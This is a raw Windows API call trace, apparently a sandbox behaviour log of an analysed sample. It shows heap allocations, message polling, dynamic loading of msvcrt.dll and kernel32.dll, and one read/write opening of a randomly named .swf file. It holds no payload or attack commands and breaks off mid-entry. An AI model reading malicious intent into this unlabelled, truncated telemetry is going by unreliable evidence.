RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.622] CharLowerBuffW (in: lpsz="byte[26859]", cchLength=0xb | out: lpsz="byte[26859]") returned 0xb [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.622] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.622] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.622] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0075.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.623] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.623] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb648 [0075.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb648, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0075.623] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.623] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a7418 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.623] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.623] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.624] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.625] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.625] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.625] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.626] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.626] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.626] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.626] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.627] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.627] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.627] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.627] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.627] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.627] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e5b8 [0075.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e5b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0075.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\wwhoeeriour.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.628] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698698 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.629] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.630] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.630] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, 